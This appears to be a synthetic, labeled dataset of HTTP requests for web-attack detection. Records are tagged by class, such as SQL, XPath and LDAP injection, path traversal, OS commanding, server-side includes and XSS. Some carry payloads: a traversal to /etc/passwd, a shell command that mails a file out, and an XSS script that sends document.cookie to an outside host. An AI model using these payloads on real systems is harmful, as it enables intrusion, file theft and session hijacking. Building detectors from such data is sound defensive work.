Upgrade: omsS/1.9, atcm2/9.8, htuh6/0.3, roto/0.9, ttttRe/7.7
Warning: 211 5.85.253.98 "saoadsette" 
X-Forwarded-For: 233.230.195.96
X-Serial-Number: 94095568311644
----: ------------------------------------------
~~~~~: ~~~~~~~~~~~~

null

End - Id: 38051
Start - Id: 46110
class: PathTransversal
POST /nMNiC8d6-yxBLbBwa/Ml2execvJrGZj/eqelqt/iTYLBs/WGT.5-h.JanYr/tn2etessanrrig/hx/tP8qXlUw/ebUG6.jd/ihapeot.mdb? HTTP/1.0
Content-Length: 168
Content-Language: hejNjo8e,Tfchgte1
Content-Encoding: identity
Content-Location: http://sgendb.net/7tlsdWnH/nrte8/tsciih.pdf
Content-MD5: bmxhd25Tb2xidW1mY2lpbw==
Content-Type: application/x-www-form-urlencoded
Expires: Fri, 26 May 06 22:47:49 UTC
Last-Modified: Tue, 06 May 08 15:40:14 UTC
Host: 74.109.221.100:936
Connection: lItrf
Accept: audio/*
Accept-Charset: iso-10646-ucs-2
Accept-Encoding: *;q=0.7
Accept-Language: mejy0-h, lt2eai-nmidge
Cache-Control: no-cache
Client-ip: 78.173.68.149
Cookie: teefSzzicHdhg=rByipAvyBS_J
Cookie2: $Version="6"
Date: Mon, 08 Feb 10 22:19:00 UTC
ETag: W/"tezP7LWPcMvfNfn.@"
Expect: 100-continue
From: sneTb@ntoa.org
If-Modified-Since: Mon, 12 Sep 05 24:38:37 CET
If-Unmodified-Since: Sun, 04 Jan 09 18:18:42 CET
If-Match: "7daUXr4sMREv4k@w11R"
If-None-Match: *
If-Range: "mAybd90AYdtRzL7"
Max-Forwards: 428
MIME-Version: 0.9
Pragma: rP='en'
Proxy-Authorization: NTLM dUF3bnVnc2Vhb3M3SGViSEVpU2NhbmFhdGVtY2dzNG5oczdob2FlZTVqczlhZ2c=
Authorization: Basic aDVlYWVyOnM0YW5kYWVh
Range: -03018,-4474
Referer: http://liepamg.fr/exme/hnrtdai/t2Ntqfcu.avi
TE: chunked;q=0.0,chunked,trailers
Trailer: If-Match
User-Agent: Mozilla/7.6 (X11; U; Unix 5.6; dn-k2; rv:9.1.6) Gecko/58047687
UA-CPU: StrongARM
UA-Disp: 013,8329,8
UA-Color: color16
UA-Pixels: 1090x096
Via: FTP/7.7 www.ezo6eiCe.css, 5.4 www.eeotiee0.jpg, FTP/3.3 87.79.168.17:4
Transfer-Encoding: Ncr4yk
Upgrade: cRpj/3.7
Warning: 825 www.rthoh4.html:3 "sTlt2eutin4eMhjcw" "Sun, 01 Feb 04 07:08:46 UTC"
X-Forwarded-For: 12.245.148.199
X-Serial-Number: 4642917448355
----: ---------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~

ooNteosWim=tn s&nGttorSmwk=2823&dlpotibo=0O6nRnsooApesdvaa&relgOabv9detNtt=bV-i_a&ohso=\.\.\/\.\.\/\.\.\/\.\.\/etc\/passwd%00.html

End - Id: 46110
Start - Id: 42793
class: SqlInjection
PUT /8CsSns/l1nElAsd/ajQHrG@WDlMA3AQ@a/lodSsbyl/hcaeeojsQessrpS/f9xh76ILR-JiT.CwO/execX/tocdpeO3/xwOd_2q5ZUvvbmk.sh? HTTP/1.1
Content-Length: 252
Content-Language: ornt
Content-Encoding: compress
Content-Location: /luaeihp3/uIdas/eatirt0o.jsp
Content-MD5: c3ZucmdyY29wb3NpMGljYQ==
Content-Type: application/x-www-form-urlencoded
Expires: Thu, 19 Feb 09 10:05:22 CET
Last-Modified: Sun, 25 Apr 10 03:38:28 GMT
Host: www.gosa.biz:80
Connection: keep-alive
Accept: */*
Accept-Charset: x-mac-roman
Accept-Encoding: *
Accept-Language: *;q=0.5
Cache-Control: no-store
Client-ip: 106.46.255.142
Cookie: zcryrlEhdiowI=OR  'litDco'   =  '  '
Cookie2: $Version="4"
Date: Fri, 31 Dec 04 05:47:24 UTC
ETag: W/"yJEoRCtv0sPfn5hZxBr"
Expect: 100-continue
From: y50ayc@nuqbmit.cz
If-Modified-Since: Wed, 13 Jan 10 15:29:54 CET
If-Unmodified-Since: Tue, 24 Oct 06 09:30:37 UTC
If-Match: *
If-None-Match: "uviDCp8TOq-wJ-D-Xl"
If-Range: Tue, 31 May 05 08:18:27 GMT
Max-Forwards: 071
MIME-Version: 1.5
Pragma: o=ecrp
Proxy-Authorization: Digest response="e0d700eE75fdBc663eae5dDC682A7d22"
Authorization: NTLM ZW9zd2dzdGFlb3NudGF6ZTd1aVBBcmVMcnRxdHRhamllNA==
Range: 866-,2-448736,67150-78210
Referer: /aaemUi6i/etnPelnn/kexria.pl
TE: chunked,deflate;q=0.5,trailers
User-Agent: Mozilla/5.3 (compatible; irbso; Linux i586; tdsoJacrY)
UA-Disp: 1555,1118,32
UA-Color: color32
UA-Pixels: 275x841
Via: 8.1 www.yrnfmitz.jpg
Transfer-Encoding: gzip
X-Serial-Number: 2573337780
----: -------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~

oaihaeoapzdooer=:x+bK&raeslldiyeCzicf=183438&adpSaesbf=86501842&2blsnnxdc=libesRg&hlUfo=hmx/uoantevalrn $@ssock_stream-<&s3aqe=cZht\e&7hi0i1wsetmrsz=yPns949i-an&oiy=5&tmsctispbt=dlAfaowm&ce3ls2=lzIU6i7Xxv&itpapwt3uceq=9751727741&oprw2no=e

End - Id: 42793
Start - Id: 49858
class: XPathInjection
GET /tjiHtXvG9/smPKibhhvTwk/o0QQCBFRo/Pp/dlMgQ1_64POd/osYG1WUP.tiff?ecn0=tlae&2IPaEarlt=sec%27+or+++path%2Fchild%3A%3Anode%28%29%5Bposition%28%29%3DN%5D+or+++%27rpldm%27++%3D++%27 HTTP/1.1
Host: 104.115.208.50
Connection: close
Accept: image/*;q=0.8
Accept-Charset: *;q=0.3
Accept-Encoding: *
Accept-Language: n7si-e, ades-ub2U;q=0.0
Cache-Control: max-stale=87190
Client-ip: 145.65.227.178
Cookie: hTet5=Lnetcat
Cookie2: $Version="51"
Date: Fri, 27 Apr 07 15:40:07 CET
ETag: W/"njZ9SR5BrraNpkr"
Expect: 100-continue
From: eslc7@67owp.net
If-Modified-Since: Thu, 05 May 05 11:47:39 UTC
If-Unmodified-Since: Thu, 24 Mar 05 18:56:24 UTC
If-Match: *
If-None-Match: "3qr4bQbvXafF6Xiy"
If-Range: Tue, 20 Sep 05 05:00:31 GMT
Max-Forwards: 390
MIME-Version: 4.7
Pragma: no-cache
Proxy-Authorization: Digest username="eo0h6hyc"
Authorization: xlE0 aelJ=NEonemxl
Range: 40331-8,658595-,136-
Referer: /beSr/sctd6tp2.php
TE: trailers
Trailer: Pragma
User-Agent: oaDarstm/7.4.7.0
UA-CPU: 68000
UA-Disp: 020,0020,32
UA-OS: Windows NT
UA-Color: color8
UA-Pixels: 967x245
Via: 9.1 62.8.231.97
Transfer-Encoding: deflate
Upgrade: soar/0.1
Warning: 988 26.40.140.189 "waoenT" 
X-Forwarded-For: 246.212.130.181
X-Serial-Number: 5095784293385
----: ----------
~~~~~: ~~~~~~~~~~~~~~~~~~

null

End - Id: 49858
Start - Id: 43071
class: OsCommanding
POST /ikkvrcyrsjaca7/sLl/snl5vIamI-Lid/Rmc3ziDOSoe4uvsl/yeB_LXORUXnAUVnCDz/axhb/Eiixahyeteakfe/eHxyHFy9y1UyE/tyomms/oqNLMFWUK7x4INtuf.js? HTTP/1.1
Content-Length: 384
Content-Language: f2hyra,lrnb,tOddm
Content-Encoding: compress
Content-Location: http://b6wHdL.uk/geltuc2y/szsar.mpeg
Content-MD5: OW5ob1NMYW9PcmN0aTdlNA==
Content-Type: application/x-www-form-urlencoded
Expires: Thu, 15 Apr 04 22:28:14 UTC
Last-Modified: Thu, 23 Oct 08 17:17:38 CET
Host: www.c9D7fi7a.gov
Connection: wtAt
Accept: video/*, audio/*;q=0.9
Accept-Charset: euc-tw, x-mac-arabic;q=0.6, euc-tw
Accept-Encoding: *;q=0.5
Accept-Language: *
Cache-Control: no-store
Client-ip: 159.80.6.131
Cookie: ueatc=pxaa;34RXdBT7r=1kiBv;tse=7377;mq6lOsat6ta=hcR9pplagk;en212bboevtdtdI=hio
Cookie2: $Version="611"
Date: Mon, 17 Aug 09 01:31:27 UTC
ETag: W/"QXl@Wqluj0HKLJ.8Ikl"
Expect: aa20=ttt7;i0sl
From: sTleEdu@dtAttFd.de
If-Modified-Since: Sat, 22 May 04 13:22:12 UTC
If-Unmodified-Since: Mon, 27 Nov 06 22:11:43 UTC
If-Match: "yELw96P@2kUYhHnCzF"
If-None-Match: "dsj7aAzseQ1@tddd"
If-Range: "nFYupowMN3Zw0Xnal"
Max-Forwards: 984
MIME-Version: 7.0
Pragma: no-cache
Proxy-Authorization: wswe njne=Ot3enhto
Authorization: NTLM aGNUMW5vc2Zmb3N5MnJvY2RuYXI2OHVuNDlhZGhzejdyYW5yaW50ZWVnbGJlbWw=
Range: 53-,7351-3480
Referer: http://www.ddntfaot.gov/tywae/kpseooc/Ctset1re/0wttmq/apa9.wmn
TE: trailers
Trailer: Accept
User-Agent: Ts0eo5d/1.9
UA-CPU: StrongARM
UA-Disp: 575,612,16
UA-OS: Win98
UA-Color: color8
UA-Pixels: 2695x320
Via: FTP/1.4 www.edishi.css, FTP/0.0 202.214.241.95, 5.0 www.R2ccN.html
Transfer-Encoding: compress
Upgrade: erhri/0.9, ete2/3.4, iiro/2.4, Vfj0h/2.8, esebzr/8.5
Warning: 511 www.SwtUak.png "nrU8ee" "Tue, 13 Jan 09 06:56:32 GMT"
X-Forwarded-For: 214.245.16.235
X-Serial-Number: 206096711388693916
----: -------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~

sxteh1spy2o=';   cat  /tmp/res   mail     ieenro@sese.com;&grobadetdg=spu2RUg_&wseth=a0dtsncuiieRArmop&9zp=k&crsaleesaefmE=2cQ3Mpk@Tq&fTFrQQVR=e  WczehE kn6&DihaolnIoeI=zihhnaet0i&eoeeatusxei=aAlerlttrqvcil&2a@4rcppEay7rK=iaa2itut9eoegod&OCYEMQkzY=r48&hssbtReyit0eS=tpoe %ssdoTt&qbuhyi0qet=H4sxh7emgt6dn7s&lEettNdo=0is)saii&bemlef=RataeTc(Ps3p]&a8stdc=rL7qcugiUi

End - Id: 43071
Start - Id: 47471
class: XSS
GET /6winntHxDp/0N8JHKb.html?lmdimoJlwuoa=eVnQhHYu&PEuk5CF1t=23496&iRRafg8a=t1egoAg%28u9qyborm&oktfrEarth=div&POFshutdownincludeIBOsam7SI=vPA%402Zsct&c.NN00B=%3Ca++href+++%3D++++%22++++about%3A%3Cs%26%2399%3Bript+++%3E%5Balert++++%28%27rre7s6rll%27%29%3B%5D%3C%2Fscript+%3E++%22%3E&CinZe-zhcato2Rj=cluj.x&aloUko=704516942&5fxmlfromU=mns%5C&48etnInnt8=GgctUpla7att&dgievxlsserr=2sgw&pqvZMZ4jsamYM=esy HTTP/1.1
Host: 88.157.158.164:706
Connection: 5aAtto
Accept: image/*, application/*;q=0.6, text/xml
Accept-Charset: *
Accept-Encoding: compress, deflate, identity, deflate;q=0.3
Accept-Language: sbh-uirn, lh-hs;q=0.5
Cache-Control: no-transform
Client-ip: 227.166.219.20
Cookie: onw=nph-hWsamU3tlmnullMjadmin;PntqHbStmpEINH=Ob=i;harteh=8939
Cookie2: $Version="37"
Date: Thu, 26 Jan 06 24:06:22 UTC
ETag: "AGbD10fcZavK4XS"
Expect: 100-continue
From: ghun@e9ggr0ugra.com
If-Modified-Since: Wed, 11 Oct 06 07:18:41 GMT
If-Unmodified-Since: Fri, 06 Nov 09 01:41:20 UTC
If-Match: *
If-None-Match: *
If-Range: Sun, 09 Apr 06 15:17:04 CET
Max-Forwards: 20
MIME-Version: 5.1
Pragma: nanI=uz4e
Proxy-Authorization: ohttg htuneE=et8ju
Authorization: Digest algorithm=MD5-sess
Range: 1-845224,09-
Referer: /uarerbar/xtoes.cgi
TE: trailers,trailers,gzip;q=0.0
Trailer: From
User-Agent: z8tctoeogfeRUxS0faaa
UA-CPU: MIPS
UA-Disp: 2372,1267,16
UA-OS: Win9x
UA-Color: color16
UA-Pixels: 747x653
Via: npa/4.4 www.oodg.gif
Transfer-Encoding: inr33
Upgrade: rshhh0/1.3
Warning: 434 www.stheqS.htm "2se9l4zCow3t" "Tue, 16 Nov 04 07:44:37 CET"
X-Forwarded-For: 250.184.177.153
X-Serial-Number: 48112496441051
----: ------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 47471
Start - Id: 36950
class: LdapInjection
POST /0NjTTf/G9EhuI4B/w5WUpVqvUoDg7QTAdv7Z/hrdmcexb0c/eO9wKCYXO5@zeD/Zso/rWaCS-LlhdWvJwjgG/ed6ceemoOndsrtHn/ezfOHUJDafXIBy/uCf42SJOa2SWL@RMB/irh0hvrtAilr0Oreynr/nnbnEetqe6hR.shtml? HTTP/1.0
Content-Length: 284
Content-Language: taapT3
Content-Encoding: identity
Content-Type: application/x-www-form-urlencoded
Host: 61.104.207.241:6240
Connection: keep-alive
Accept: text/*;q=0.1, image/*;q=0.8
Accept-Encoding: 
Accept-Language: cseiTx-leRwldEh;q=0.5, clt-5oi3h
Cache-Control: no-store
Date: Thu, 18 Mar 04 04:40:15 UTC
If-Match: "QyhTagReqJgmrG4b@oAq"
Authorization: Basic NmlhRWE6aWtlc1pu
Referer: http://8NI090r.net/wih4s/enfmt/o1Rat/osTihdl.mdb
User-Agent: Mozilla/2.0 (Windows; U; Win98 1.5; hL-am; rv:1.3.5) Gecko/54621615
UA-OS: Win98
Via: 4.6 www.owac.shtml, HTTP/1.1 www.e0ote.htm
Transfer-Encoding: gzip

pnc6aeUltt=7&e9amysoo8pa=Ioe5ze>dnob]rt<&scriptD5BksystemgDM4=eA6slkv44U&scriptp81z=cobjectl34A|tnyscd N&ehslsadi=ha~uk&Amotrere=7&ixo6ei=o4m&ronehnwj7s=8451949&aahBiXCYiante=sehte&UKalljxL-=")(targetfilter=(o=NetscapeRoot))&p5taBd=dIYdE4&oaxiidoe=46d90saljq

End - Id: 36950
Start - Id: 40914
class: SSI
GET /eoitt9ahhin/l_IjzvUPUsIJ/rSgpkOqlUOX/ePRRTJ/nJ9ft744MjJnc.jpg?se=%3C%21--%23odbc++connect%3D%22gncm5%2Cottmg%2Chsc%22+++statement%3D%22select+++++*++from++++yaa%22--%3E HTTP/1.0
Host: 58.203.159.198
Connection: keep-alive
Accept: video/*, image/png;q=0.8
Accept-Charset: *
Accept-Encoding: gzip;q=0.1, compress;q=0.8
Accept-Language: *;q=0.7
Cache-Control: max-stale
Client-ip: 107.204.228.141
Cookie: 3RfB=cOw
Cookie2: $Version="3"
Date: Mon, 16 Nov 09 02:04:50 CET
ETag: "4DOTsaKeuKe20mWmkYac"
Expect: 100-continue
From: 7tnz7e@rrkue5aod.it
If-Modified-Since: Wed, 20 Jul 05 09:15:09 CET
If-Unmodified-Since: Mon, 29 Jun 09 19:59:44 UTC
If-Match: *
If-None-Match: "PSEzn77E@@YPz-fz"
If-Range: *
Max-Forwards: 006
MIME-Version: 9.9
Pragma: nii=tnieOy
Authorization: Digest algorithm=MD5
Range: 518194-7
Referer: http://okxayy.net/toaa/SEir/ddm4fnf/rE6a85/3hlnQ.mp3
TE: trailers
Trailer: Accept-Encoding
User-Agent: raej (lPgotE0GWE; rLMs6o-F; aSLo9emo@)
UA-CPU: MIPS
UA-OS: Windows 95
UA-Color: color32
Via: 9.3 www.reeFohso.htm, 5.5 202.245.151.136:220
Transfer-Encoding: compress
Upgrade: Oeoe/7.5, tls/2.6
Warning: 086 61.20.174.151 "hej5T2phoa6l2adseC1t" 
X-Forwarded-For: 175.203.115.62
X-Serial-Number: 163741114628927
----: ------------------

null

End - Id: 40914
Start - Id: 49508
class: XPathInjection
GET /nMn/s2iOrM1@Bo9VbNMh/olis9d75u/KKWNAiMR6.DAX/sK8fFkacXNJ0Z/izaanca/82-/sB1QYWoptuHHH0bYc/.D530Tp6but_MT8/tt77trmn6ezqpitRtob/coZgH-wzm.tiff?riIfOtno6iA8xoT=403&rs4dltv7nsinun=yatklb&tmpiattearhj=iED2mj&aiue=726++++or+++count%28path%2Fchild%3A%3Anode%28%29%5Bposition%28%29%3D%28%28i%2Bj%2Bk%2Bl%2B1%29%5D+++++%7C++++path%2Fchild%3A%3A*%28%29%5Bposition%28%29%3D%28k%2B1%29%5D%29%3D1++or++655%3D&YJL%uTrpD9Y=hboRifcssrordm HTTP/1.0
Host: www.hcs9e.ch:72
Connection: keep-alive
Accept: application/zip;q=0.6
Accept-Charset: *
Accept-Encoding: compress;q=0.8
Accept-Language: g-h2beI;q=0.0, g-foe, nlh-oohvl, npe-nerhhia, 4-o8Ax;q=0.1
Cache-Control: no-cache
Client-ip: 42.49.173.73
Cookie: fevMaroyuh=3;3rereynqeegLs= ooctnhu;hreiepodd=ozrpa
Cookie2: $Version="988"
Date: Wed, 24 Dec 08 08:14:49 GMT
ETag: W/"r2AbaBUZcYbH-sHcVU8"
Expect: 100-continue
From: egyritN@etesgoUsht.it
If-Modified-Since: Mon, 30 Nov 09 06:24:18 GMT
If-Unmodified-Since: Sun, 13 Dec 09 20:57:57 UTC
If-Match: "GKeXE8uhsI9QuLqeb3-a"
If-None-Match: "jXfoYw5SlSwVNd7CGXV"
If-Range: "-9BPWH.4WlUwV-5q-HX2"
Max-Forwards: 5
MIME-Version: 2.5
Pragma: no-cache
Proxy-Authorization: ao6tbr qsmelsdm=S7mcd8of
Authorization: Digest qop=auth-int
Range: 2-801463,7709-,5-5829
Referer: /eelirol/rqnAo/aLepnle/nmuhis.ace
TE: trailers
Trailer: Date
User-Agent: iq8ErwA http://www.mdcewb.st
UA-CPU: Sparc
UA-Disp: 2924,8513,8
UA-OS: Windows 95
UA-Color: color8
UA-Pixels: 4726x3292
Via: 5.4 www.nhzio0eo.gif, 2.6 www.wfwftt.jpeg, i9i/1.1 www.toeOtt.js
Transfer-Encoding: gzip
Upgrade: n7e/3.5, tspSaa/1.0, aveuwt/9.7
Warning: 646 www.qqkiis.css "nsutrl9tXaNtumo" 
X-Forwarded-For: 113.38.28.52
X-Serial-Number: 201583507
----: --------------------
~~~~~: ~~~~~~~~~~~~~~~

null

End - Id: 49508
Start - Id: 36257
class: PathTransversal
PUT /e0xhajtiiFy6J/utnon/5Rexadtseo4/d5tjrateasue8waa/Iayaeninlctixaql5utn/bmHc/aEfbiuo/M-Qc9E.tGdGW/fNWgN2UCBJK9PAxIL.cfm? HTTP/1.1
Content-Length: 128
Content-Language: btbsh,t,itsaeio
Content-Encoding: deflate
Content-Location: /qopouDrd/uccjictu/sxmh/i7itoRqs.conf
Content-MD5: c2hyaFltcmVlVG9qNXRVZA==
Content-Type: application/x-www-form-urlencoded
Expires: Tue, 09 Mar 04 06:59:31 CET
Last-Modified: Sun, 01 Feb 09 12:08:25 UTC
Host: www.s8bt5.biz
Connection: close
Accept: application/*;q=0.0, image/*, video/quicktime;q=0.5
Accept-Charset: utf-8, iso-8859-2;q=0.2, iso-2022-jp;q=0.5, x-mac-chinesetrad;q=0.6, euc-tw
Accept-Encoding: deflate;q=0.5, deflate, gzip;q=0.7
Accept-Language: *;q=0.1
Cache-Control: no-transform
Client-ip: 112.174.108.236
Cookie: rNopadbwagmeo2t=eIlM;9tginmnP=qK11jFCRb;1irss0ovoik=oeweeunthunOs;KtNQwEJOMRB=6
Cookie2: $Version="1"
Date: Tue, 06 May 08 07:55:55 GMT
ETag: W/"jRY8PxZkXX-fCGouhR8"
Expect: eigacm=eafotax;3ngniEI=1owL6ot
From: tarcw@rtJihd7rad.st
If-Modified-Since: Wed, 28 Mar 07 16:19:32 CET
If-Unmodified-Since: Tue, 27 Nov 07 15:16:24 GMT
If-Match: "x4aNwGZQrBQOuTDN5c"
If-None-Match: "FNgOUp_BeNPShhitxQ"
If-Range: Thu, 08 May 08 19:56:09 UTC
Max-Forwards: 4
MIME-Version: 4.1
Authorization: 0Igdh 1eptE=emod
Range: 52-067988,48957-
Referer: http://www.ubhpeE.de/rkxEe/eooGelz/33omOq/t22vy4t.mdb
Trailer: Via
User-Agent: ndIj8dAeZ http://www.qfaspnet.org
UA-Pixels: 274x803
Transfer-Encoding: deflate
Warning: 120 183.198.212.10 "5hoema" "Mon, 27 Nov 06 04:28:46 GMT"
X-Serial-Number: 373561345188
----: ------------------------------

Masntue=\.\.\/\.\.\/etc\/otqaRn.conf&uaoi0mNh=900&04aq8t5= Fj>hnton ioe@system7systemi&ohttwst=1b:osto

End - Id: 36257
Start - Id: 49547
class: XPathInjection
GET /eemnpdAvayu/KRzlaOzoxKIpsbk-/tiG06YZSsX0pvRYVX/ahnn/f5imgrs9_t.msf?Cebbc11aste=6++++or++++count%28path%2Fchild%3A%3Anode%28%29%5Bposition%28%29%3D%28%28i%2Bj%2Bk%2Bl%2B1%29%5D+%7C+++++path%2Fchild%3A%3A*%28%29%5Bposition%28%29%3D%28k%2B1%29%5D%29%3D1++++or++++41954%3D&ricW9=wyuLantoAouyst&pTl155eqya2MZi=55636&6te=srifni&0io=aLexecd%24tfhA&pandgopt1FsRscriptC=sEbentctdie5t9x&s4pseVushwlEa=njchtbg6apet&n091bi1v=a-iuO1e%40li&knaij2rcSoa=a9%7E&.60o9qK=1&akq1oybCttteae=e7GROAAtzJ&w3saypcrhRietie=a6siy2sc6i9 HTTP/1.0
Host: 195.17.141.86
Connection: close
Accept: audio/*;q=0.7, audio/basic
Accept-Charset: big5;q=0.0
Accept-Encoding: 
Accept-Language: de-eo5uetaa, 4a-aec;q=0.6
Cache-Control: max-age=70
Client-ip: 74.98.44.206
Cookie: e8veaon=ur;rzn5jeylnnoini=ys29e6h|
Cookie2: $Version="745"
Date: Sat, 12 Jul 08 04:21:24 GMT
ETag: "-RjzUPDGi0.zC78Rw@4@"
Expect: ay2otsbp=eltj
From: wirtsy@nexe4eht.ch
If-Modified-Since: Fri, 22 Sep 06 14:52:54 GMT
If-Unmodified-Since: Sun, 20 Apr 08 22:19:39 UTC
If-Match: "JIhVDcQL05P2BVb"
If-None-Match: *
If-Range: "2nI2hWWKa0PeQB@"
Max-Forwards: 2
MIME-Version: 5.0
Pragma: gu='nbee'
Proxy-Authorization: Digest username="93es"
Authorization: Digest nc=38EfCcD9
Range: -9141,-5899,4-
Referer: http://www.kYebi.de/t1trg68.msf
TE: gzip,deflate,chunked;q=0.8
Trailer: Accept-Charset
User-Agent: e3reloeh
UA-CPU: Sparc
UA-Disp: 2924,8513,8
UA-OS: Win95
UA-Color: color16
UA-Pixels: 9192x115
Via: 2.1 www.imntat.html, 7.5 79.177.145.70
Transfer-Encoding: o1sa9k
Upgrade: os2eA/3.8, zes2/5.7, z6sc/6.6, jntir/3.8
Warning: 066 177.133.141.195 "uvomreyngrucmsS" "Mon, 08 Mar 10 06:12:12 GMT"
X-Forwarded-For: 17.226.135.24
X-Serial-Number: 5171892279457940
----: -------------------
~~~~~: ~~~~~~~~~~~~

null

End - Id: 49547
Start - Id: 49403
class: XPathInjection
GET /e5Wb9/aZ4Hfgs-z/kOJflrrR1CD7Lgs4pn/mneigt/aY.0RMyB5ZDTgDHR1AF.png?.lcaty=251394&eeen=k&pYhtaccesz_zuXexect=hnsfd4uphiushj&rj7j=4++++or+++1%3C++++tn9%2Ftte%2Fah1s%2Fchild%3A%3Atext%28%29%5Bposition%28%29%3D1%5D+++or+67581%3D%27%5D+%7C+%2F*+%7C+%2Ffoo%5Bbar%3D%27&tibu=az&brphxdwhere-dylG=aljnSoopuEm&i8i=38446&6mtdwean=ieti&0cmdRiSMbu_=887&preieNO0nHne=174884147&NEm=%24nertnt&lkbstangcuhd6=ue&rwaaeaarlleO=i8Et HTTP/1.1
Host: www.aqeNc.gov
Connection: keep-alive
Accept: text/html, image/*;q=0.7
Accept-Charset: shift_jis;q=0.7, x-mac-arabic;q=0.4, isiri-3342;q=0.7
Accept-Encoding: *;q=0.5
Accept-Language: *
Cache-Control: no-store
Client-ip: 81.222.19.244
Cookie: 8d1oil5=tsop1cry1y;aa5oeN8=367716408;ouodRdadnt=778;Ys8qiydNe=8t a2rinor4replace;Es@XNgTrsrnf=55
Cookie2: $Version="461"
Date: Wed, 31 Mar 04 04:25:59 CET
ETag: W/"rUzInsOwOf8G0X7o-"
Expect: pmtehnge
From: otnE6rt@cbsnLanere.cz
If-Modified-Since: Wed, 30 Nov 05 21:39:18 UTC
If-Unmodified-Since: Sun, 02 May 10 03:40:52 CET
If-Match: *
If-None-Match: *
If-Range: Wed, 13 Jul 05 19:04:47 GMT
Max-Forwards: 353
MIME-Version: 4.7
Pragma: no-cache
Proxy-Authorization: NTLM dWJzaGxuZXR5c3Nsbm5kdXJ6MHJkcjdhUmFkaGFqdGhpbnZobnNl
Authorization: o6hk nUnoo9=kdsnx
Range: 708062-
Referer: http://lecDyl.it/66tr/tadn/ijptmam/tcXbf.dll
TE: trailers
Trailer: If-Range
User-Agent: 5dshsmgCh (ijMYPbmSd; nBN2SWIA; uy7YmZBgr; w6MZ1C; 2B@eYC@aD)
UA-CPU: StrongARM
UA-Disp: 427,646,32
UA-OS: Windows 98
UA-Color: color16
UA-Pixels: 334x4748
Via: 0.4 www.uejfxj6.png, 4.2 www.aptodf.gif, 8.4 www.tozmn.css
Transfer-Encoding: deflate
Upgrade: shoq/5.8, ecn/2.0, sha/2.4
Warning: 573 www.w0le3ue.js:98108 "oaMintne07soeaotcrtl" 
X-Forwarded-For: 151.48.131.243
X-Serial-Number: 37054990
----: -------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 49403
Start - Id: 42325
class: SqlInjection
GET /bN7y/y4r6goo9Rion7dnt.nsf?a2AKIaer=n%3Cdropi%2Findt+&3SqB@XUX=wahttp&idInndta99st=nZlD&lbtteEb9ySd=+namanet&ZYc9=tiTEfejgsin&tCseo5=773993&edtohSeeemyrpep=qwer%27++++or+++vx5maa_v.Account%3D%27vpi%401ee.com&tsenekasntaaedE=6&edat=steswinntsTopny%3DpbaM&rtcb0rdiutuxdIs=esi HTTP/1.0
Host: 137.182.239.253
Connection: keep-alive
Accept: application/*;q=0.9
Accept-Charset: *
Accept-Encoding: 
Accept-Language: *;q=0.5
Cache-Control: a=Il5iec9a
Client-ip: 64.206.153.107
Cookie: gl7oywwtw=etnmhturye;cghXnqntlftwv=eapassthruittxp_tf8E;43Cm0=@hoerro/h
Cookie2: $Version="8"
Date: Sat, 08 Nov 08 22:03:39 UTC
ETag: "Ksz6YAgeD1hO7Ki"
Expect: 100-continue
From: vtsibh@nsti.biz
If-Modified-Since: Sat, 19 Dec 09 02:46:38 CET
If-Unmodified-Since: Fri, 28 Nov 08 01:06:39 UTC
If-Match: "rw.YDwGXs7gtEM_vcg"
If-None-Match: *
If-Range: "DQ9p_1YBE74Or.AazTG"
Max-Forwards: 82
MIME-Version: 1.1
Pragma: no-cache
Proxy-Authorization: aslasl sfwmhi=G8in4aid
Authorization: Digest cnonce="sli9ah"
Range: 14-31357
Referer: http://www.yeett.uk/auaee/ew9Ne/e6aI/csno4p/2exhe.zip
TE: chunked;q=0.6
Trailer: If-Match
User-Agent: Mozilla/6.8 (compatible; MSIE 2.2; Win 9x; tsN9neh3)
UA-CPU: MIPS
UA-Disp: 695,8049,32
UA-OS: Mac OS X
UA-Color: color32
UA-Pixels: 4371x6437
Via: HTTP/9.8 www.mhes.jpeg, mtoeI/8.9 www.u8cnr.css:4, 2.0 152.63.68.33:20
Transfer-Encoding: identity
Upgrade: roeoon/1.6, etEa/9.2
Warning: 797 57.31.42.175 "ddh8os78iba" "Mon, 22 Aug 05 11:07:24 UTC"
X-Forwarded-For: 47.158.122.16
X-Serial-Number: 807714416153290560
----: ------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 42325
Start - Id: 47644
class: XSS
GET /8vISQLfCY9/s27cA@a5zUnWuJKb/e-i4CJFI0oUgyJGGs/zAf/ornnnojOldbvEetvi9/access_logw.htm?lt=ct3Ave&te=%5B%5CxC0%5D%5B%5CxBC%5Dscript++++%3E%5Bdocument.location.replace%28%27http%3A%2F%2Fwww.enar.com%2Fcgi-bin%2Fro.cgi%27%2Bdocument.cookie%29%3B%5D%5B%5CxC0%5D%5B%5CxBC%5D%2Fscript%3E&dsq=uSde8lled&9ItNb.USBkr=nLIlase%3Baia%5CAum%5Chichildv&axSdir=rgatystS2nhiTr&pli=281&O6s7wgetj=tiybtrfwEhdrop&x4dz=onose&iehNonv2hJbmvQ=9hu%2Bonsock_stream&szeiTftftweeytn=deletecwz&dncXe=ygn90n+eE%3Fy&mnhHi=ht&bylAiec8Wa=ho9eI&atowvebbete=12040571 HTTP/1.0
Host: www.o0kiecuw.st
Connection: keep-alive
Accept: image/gif, text/html;q=0.8
Accept-Charset: *;q=0.9
Accept-Encoding: compress, identity;q=0.8, gzip;q=0.3, identity, deflate
Accept-Language: *
Cache-Control: max-age=57289
Client-ip: 168.210.69.11
Cookie: dqDusvoxtd9=dh9S.vha;ushutdownArBvsamstyle=rxdJnhayr
Cookie2: $Version="2"
Date: Mon, 11 Oct 04 01:13:45 CET
ETag: W/"KeyKdGthDghEQTc"
Expect: 100-continue
From: tdjaSrwt@arqsc.uk
If-Modified-Since: Wed, 24 Mar 10 03:02:18 GMT
If-Unmodified-Since: Thu, 17 Dec 09 02:13:48 CET
If-Match: *
If-None-Match: "g0Nxp49zdnVaV17qXr1"
If-Range: "lFZ0gggcJ8dQ6@gQ"
Max-Forwards: 3
MIME-Version: 9.3
Pragma: no-cache
Proxy-Authorization: Shua lcneb8s=ocgeddwh
Authorization: bcne ert91a=8esiolw
Range: 51-,059585-
